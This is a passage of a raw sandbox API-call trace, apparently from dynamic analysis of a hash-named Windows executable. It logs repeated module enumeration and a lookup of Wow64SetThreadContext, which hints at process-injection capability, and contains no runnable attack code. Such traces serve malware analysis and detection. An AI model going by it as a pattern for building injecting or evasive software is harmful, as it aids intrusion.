lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\eb4cca4f06a15158c3f7e2c56516729b\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\eb4cca4f06a15158c3f7e2c56516729b\\system.core.ni.dll")) returned 0x6e [0109.010] GetModuleInformation (in: hProcess=0x32c, hModule=0x6e8f0000, lpmodinfo=0x258dd54, cb=0xc | out: lpmodinfo=0x258dd54*(lpBaseOfDll=0x6e8f0000, SizeOfImage=0xd000, EntryPoint=0x6e8f63e0)) returned 1 [0109.011] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6e8f0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="amsi.dll") returned 0x8 [0109.011] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6e8f0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll")) returned 0x1c [0109.012] GetModuleInformation (in: hProcess=0x32c, hModule=0x764d0000, lpmodinfo=0x258fe58, cb=0xc | out: lpmodinfo=0x258fe58*(lpBaseOfDll=0x764d0000, SizeOfImage=0x6000, EntryPoint=0x764d1460)) returned 1 [0109.013] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x764d0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0109.014] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x764d0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")) returned 0x1d [0109.014] GetModuleInformation (in: hProcess=0x32c, hModule=0x71560000, lpmodinfo=0x2591f5c, cb=0xc | out: lpmodinfo=0x2591f5c*(lpBaseOfDll=0x71560000, SizeOfImage=0x1b000, EntryPoint=0x71569050)) returned 1 [0109.016] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x71560000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0109.016] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x71560000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")) returned 0x1e [0109.017] GetModuleInformation (in: hProcess=0x32c, hModule=0x74eb0000, lpmodinfo=0x2594068, cb=0xc | out: lpmodinfo=0x2594068*(lpBaseOfDll=0x74eb0000, SizeOfImage=0x13ff000, EntryPoint=0x7506b990)) returned 1 [0109.018] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74eb0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="shell32.dll") returned 0xb [0109.018] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74eb0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")) returned 0x1f [0109.019] GetModuleInformation (in: hProcess=0x32c, hModule=0x76800000, lpmodinfo=0x2596280, cb=0xc | out: lpmodinfo=0x2596280*(lpBaseOfDll=0x76800000, SizeOfImage=0x37000, EntryPoint=0x76803b50)) returned 1 [0109.020] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76800000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="cfgmgr32.dll") returned 0xc [0109.022] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76800000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")) returned 0x20 [0109.022] GetModuleInformation (in: hProcess=0x32c, hModule=0x745b0000, lpmodinfo=0x2598394, cb=0xc | out: lpmodinfo=0x2598394*(lpBaseOfDll=0x745b0000, SizeOfImage=0x4f9000, EntryPoint=0x747b7610)) returned 1 [0109.023] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x745b0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="windows.storage.dll") returned 0x13 [0109.024] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x745b0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")) returned 0x27 [0109.046] GetModuleInformation (in: hProcess=0x32c, hModule=0x74520000, lpmodinfo=0x23a8b8c, cb=0xc | out: lpmodinfo=0x23a8b8c*(lpBaseOfDll=0x74520000, SizeOfImage=0x8d000, EntryPoint=0x74569b90)) returned 1 [0109.046] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74520000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="shcore.dll") returned 0xa [0109.047] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74520000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shcore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")) returned 0x1e [0109.048] GetModuleInformation (in: hProcess=0x32c, hModule=0x76470000, lpmodinfo=0x23aac98, cb=0xc | out: lpmodinfo=0x23aac98*(lpBaseOfDll=0x76470000, SizeOfImage=0x44000, EntryPoint=0x76477410)) returned 1 [0109.049] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76470000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="powrprof.dll") returned 0xc [0109.049] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76470000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")) returned 0x20 [0109.050] GetModuleInformation (in: hProcess=0x32c, hModule=0x73f20000, lpmodinfo=0x23acdac, cb=0xc | out: lpmodinfo=0x23acdac*(lpBaseOfDll=0x73f20000, SizeOfImage=0xf000, EntryPoint=0x73f22e40)) returned 1 [0109.051] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73f20000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0109.052] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73f20000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")) returned 0x1f [0109.053] CloseHandle (hObject=0x32c) returned 1 [0109.054] GetProcAddress (hModule=0x76720000, lpProcName="Wow64SetThreadContext") returned 0x76763e60 [0109.055] GetCurrentProcessId () returned 0x139c [0109.055] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x139c) returned 0x32c [0109.055] EnumProcessModules (in: hProcess=0x32c, lphModule=0x23b1444, cb=0x100, lpcbNeeded=0x19eae0 | out: lphModule=0x23b1444, lpcbNeeded=0x19eae0) returned 1 [0109.055] GetModuleInformation (in: hProcess=0x32c, hModule=0x400000, lpmodinfo=0x23b1584, cb=0xc | out: lpmodinfo=0x23b1584*(lpBaseOfDll=0x400000, SizeOfImage=0x178000, EntryPoint=0x0)) returned 1 [0109.056] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x400000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe") returned 0x44 [0109.056] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x400000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe")) returned 0x62 [0109.056] GetModuleInformation (in: hProcess=0x32c, hModule=0x771d0000, lpmodinfo=0x23b37a8, cb=0xc | out: lpmodinfo=0x23b37a8*(lpBaseOfDll=0x771d0000, SizeOfImage=0x17b000, EntryPoint=0x0)) returned 1 [0109.056] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x771d0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0109.056] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x771d0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0109.056] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f8b0000, lpmodinfo=0x23b58ac, cb=0xc | out: lpmodinfo=0x23b58ac*(lpBaseOfDll=0x6f8b0000, SizeOfImage=0x59000, EntryPoint=0x6f8c0780)) returned 1 [0109.057] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f8b0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0109.057] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f8b0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0109.057] GetModuleInformation (in: hProcess=0x32c, hModule=0x76720000, lpmodinfo=0x23b79b8, cb=0xc | out: lpmodinfo=0x23b79b8*(lpBaseOfDll=0x76720000, SizeOfImage=0xe0000, EntryPoint=0x76733980)) returned 1 [0109.057] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76720000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0109.057] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76720000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0109.058] GetModuleInformation (in: hProcess=0x32c, hModule=0x76910000, lpmodinfo=0x23b9acc, cb=0xc | out: lpmodinfo=0x23b9acc*(lpBaseOfDll=0x76910000, SizeOfImage=0x17e000, EntryPoint=0x769c1b90)) returned 1 [0109.058] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76910000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0109.058] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76910000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0109.058] GetModuleInformation (in: hProcess=0x32c, hModule=0x73e50000, lpmodinfo=0x23bbc14, cb=0xc | out: lpmodinfo=0x23bbc14*(lpBaseOfDll=0x73e50000, SizeOfImage=0x92000, EntryPoint=0x73e90380)) returned 1 [0109.059] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73e50000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0109.059] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73e50000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0109.059] GetModuleInformation (in: hProcess=0x32c, hModule=0x76600000, lpmodinfo=0x23bdd20, cb=0xc | out: lpmodinfo=0x23bdd20*(lpBaseOfDll=0x76600000, SizeOfImage=0x7b000, EntryPoint=0x7661e970)) returned 1 [0109.059] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76600000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0109.060] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76600000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0109.060] GetModuleInformation (in: hProcess=0x32c, hModule=0x76a90000, lpmodinfo=0x23bfe34, cb=0xc | out: lpmodinfo=0x23bfe34*(lpBaseOfDll=0x76a90000, SizeOfImage=0xbe000, EntryPoint=0x76ac5630)) returned 1 [0109.060] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76a90000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0109.060] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76a90000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0109.061] GetModuleInformation (in: hProcess=0x32c, hModule=0x76cb0000, lpmodinfo=0x23c1f40, cb=0xc | out: lpmodinfo=0x23c1f40*(lpBaseOfDll=0x76cb0000, SizeOfImage=0x44000, EntryPoint=0x76cc9d80)) returned 1 [0109.061] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76cb0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0109.061] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76cb0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0109.061] GetModuleInformation (in: hProcess=0x32c, hModule=0x76c00000, lpmodinfo=0x23c4098, cb=0xc | out: lpmodinfo=0x23c4098*(lpBaseOfDll=0x76c00000, SizeOfImage=0xad000, EntryPoint=0x76c14f00)) returned 1 [0109.062] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76c00000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0109.062] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76c00000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0109.062] GetModuleInformation (in: hProcess=0x32c, hModule=0x73f00000, lpmodinfo=0x23c61a4, cb=0xc | out: lpmodinfo=0x23c61a4*(lpBaseOfDll=0x73f00000, SizeOfImage=0x1e000, EntryPoint=0x73f0b640)) returned 1 [0109.063] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73f00000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0109.063] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73f00000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0109.063] GetModuleInformation (in: hProcess=0x32c, hModule=0x73ef0000, lpmodinfo=0x23c82b0, cb=0xc | out: lpmodinfo=0x23c82b0*(lpBaseOfDll=0x73ef0000, SizeOfImage=0xa000, EntryPoint=0x73ef2a00)) returned 1 [0109.064] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73ef0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0109.064] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73ef0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0109.064] GetModuleInformation (in: hProcess=0x32c, hModule=0x76840000, lpmodinfo=0x23ca3c4, cb=0xc | out: lpmodinfo=0x23ca3c4*(lpBaseOfDll=0x76840000, SizeOfImage=0x58000, EntryPoint=0x768825c0)) returned 1 [0109.065] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76840000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="bcryptPrimitives.dll") returned 0x14 [0109.065] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76840000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")) returned 0x28 [0109.065] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f910000, lpmodinfo=0x23cc4f8, cb=0xc | out: lpmodinfo=0x23cc4f8*(lpBaseOfDll=0x6f910000, SizeOfImage=0x7d000, EntryPoint=0x6f920db0)) returned 1 [0109.066] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f910000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0109.066] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f910000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0109.066] GetModuleInformation (in: hProcess=0x32c, hModule=0x76d00000, lpmodinfo=0x23ce640, cb=0xc | out: lpmodinfo=0x23ce640*(lpBaseOfDll=0x76d00000, SizeOfImage=0x45000, EntryPoint=0x76d1de90)) returned 1 [0109.067] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76d00000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0109.067] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76d00000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SHLWAPI.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")) returned 0x1f [0109.068] GetModuleInformation (in: hProcess=0x32c, hModule=0x762b0000, lpmodinfo=0x23d074c, cb=0xc | out: lpmodinfo=0x23d074c*(lpBaseOfDll=0x762b0000, SizeOfImage=0x1bd000, EntryPoint=0x76392a10)) returned 1 [0109.068] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x762b0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="combase.dll") returned 0xb [0109.069] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x762b0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")) returned 0x1f [0109.069] GetModuleInformation (in: hProcess=0x32c, hModule=0x74ab0000, lpmodinfo=0x23d2858, cb=0xc | out: lpmodinfo=0x23d2858*(lpBaseOfDll=0x74ab0000, SizeOfImage=0x14f000, EntryPoint=0x74b66820)) returned 1 [0109.069] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74ab0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0109.070] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74ab0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0109.070] GetModuleInformation (in: hProcess=0x32c, hModule=0x743d0000, lpmodinfo=0x23d49e8, cb=0xc | out: lpmodinfo=0x23d49e8*(lpBaseOfDll=0x743d0000, SizeOfImage=0x147000, EntryPoint=0x743e1cf0)) returned 1 [0109.071] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x743d0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0109.071] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x743d0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0109.072] GetModuleInformation (in: hProcess=0x32c, hModule=0x741b0000, lpmodinfo=0x23d6af4, cb=0xc | out: lpmodinfo=0x23d6af4*(lpBaseOfDll=0x741b0000, SizeOfImage=0x2b000, EntryPoint=0x741b5680)) returned 1 [0109.072] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x741b0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0109.072] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x741b0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IMM32.DLL" (normalized: "c:\\windows\\syswow64\\imm32.dll")) returned 0x1d [0109.073] GetModuleInformation (in: hProcess=0x32c, hModule=0x76d50000, lpmodinfo=0x23d8bf8, cb=0xc | out: lpmodinfo=0x23d8bf8*(lpBaseOfDll=0x76d50000, SizeOfImage=0xc000, EntryPoint=0x76d53930)) returned 1 [0109.073] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76d50000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="kernel.appcore.dll") returned 0x12 [0109.074] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76d50000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")) returned 0x26 [0109.074] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f8a0000, lpmodinfo=0x23dad24, cb=0xc | out: lpmodinfo=0x23dad24*(lpBaseOfDll=0x6f8a0000, SizeOfImage=0x8000, EntryPoint=0x6f8a17b0)) returned 1 [0109.075] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f8a0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0109.075] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f8a0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\VERSION.dll" (normalized: "c:\\windows\\syswow64\\version.dll")) returned 0x1f [0109.076] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f1b0000, lpmodinfo=0x23dce30, cb=0xc | out: lpmodinfo=0x23dce30*(lpBaseOfDll=0x6f1b0000, SizeOfImage=0x6e1000, EntryPoint=0x6f1dcd70)) returned 1 [0109.076] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f1b0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0109.077] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f1b0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")) returned 0x35 [0109.077] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f0b0000, lpmodinfo=0x23def60, cb=0xc | out: lpmodinfo=0x23def60*(lpBaseOfDll=0x6f0b0000, SizeOfImage=0xf5000, EntryPoint=0x6f104160)) returned 1 [0109.078] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f0b0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="MSVCR120_CLR0400.dll") returned 0x14 [0109.078] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f0b0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSVCR120_CLR0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")) returned 0x28 [0109.079] GetModuleInformation (in: hProcess=0x32c, hModule=0x6d400000, lpmodinfo=0x23e1094, cb=0xc | out: lpmodinfo=0x23e1094*(lpBaseOfDll=0x6d400000, SizeOfImage=0x12b2000, EntryPoint=0x0)) returned 1 [0109.079] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6d400000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0109.080] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6d400000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll")) returned 0x68 [0109.080] GetModuleInformation (in: hProcess=0x32c, hModule=0x74dc0000, lpmodinfo=0x23e323c, cb=0xc | out: lpmodinfo=0x23e323c*(lpBaseOfDll=0x74dc0000, SizeOfImage=0xeb000, EntryPoint=0x74dfd650)) returned 1 [0109.081] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74dc0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0109.081] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74dc0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0109.082] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f030000, lpmodinfo=0x23e5340, cb=0xc | out: lpmodinfo=0x23e5340*(lpBaseOfDll=0x6f030000, SizeOfImage=0x80000, EntryPoint=0x6f031180)) returned 1 [0109.083] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f030000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0109.085] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f030000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")) returned 0x38 [0109.085] GetModuleInformation (in: hProcess=0x32c, hModule=0x76680000, lpmodinfo=0x23e7480, cb=0xc | out: lpmodinfo=0x23e7480*(lpBaseOfDll=0x76680000, SizeOfImage=0x92000, EntryPoint=0x766b8cf0)) returned 1 [0109.086] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76680000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0109.087] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76680000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\OLEAUT32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0109.087] GetModuleInformation (in: hProcess=0x32c, hModule=0x6ca30000, lpmodinfo=0x23e9594, cb=0xc | out: lpmodinfo=0x23e9594*(lpBaseOfDll=0x6ca30000, SizeOfImage=0x9cc000, EntryPoint=0x0)) returned 1 [0109.088] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6ca30000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0109.088] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6ca30000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\1be7a15b1f33bf22e4f53aaf45518c77\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\1be7a15b1f33bf22e4f53aaf45518c77\\system.ni.dll")) returned 0x64 [0109.089] GetModuleInformation (in: hProcess=0x32c, hModule=0x6e900000, lpmodinfo=0x23eb730, cb=0xc | out: lpmodinfo=0x23eb730*(lpBaseOfDll=0x6e900000, SizeOfImage=0x721000, EntryPoint=0x0)) returned 1 [0109.090] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6e900000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="System.Core.ni.dll") returned 0x12 [0109.090] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6e900000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\eb4cca4f06a15158c3f7e2c56516729b\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\eb4cca4f06a15158c3f7e2c56516729b\\system.core.ni.dll")) returned 0x6e [0109.091] GetModuleInformation (in: hProcess=0x32c, hModule=0x6e8f0000, lpmodinfo=0x23ed8ec, cb=0xc | out: lpmodinfo=0x23ed8ec*(lpBaseOfDll=0x6e8f0000, SizeOfImage=0xd000, EntryPoint=0x6e8f63e0)) returned 1 [0109.092] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6e8f0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="amsi.dll") returned 0x8 [0109.092] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6e8f0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll")) returned 0x1c [0109.093] GetModuleInformation (in: hProcess=0x32c, hModule=0x764d0000, lpmodinfo=0x23ef9f0, cb=0xc | out: lpmodinfo=0x23ef9f0*(lpBaseOfDll=0x764d0000, SizeOfImage=0x6000, EntryPoint=0x764d1460)) returned 1 [0109.094] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x764d0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0109.094] GetModuleFileNameExW (in: 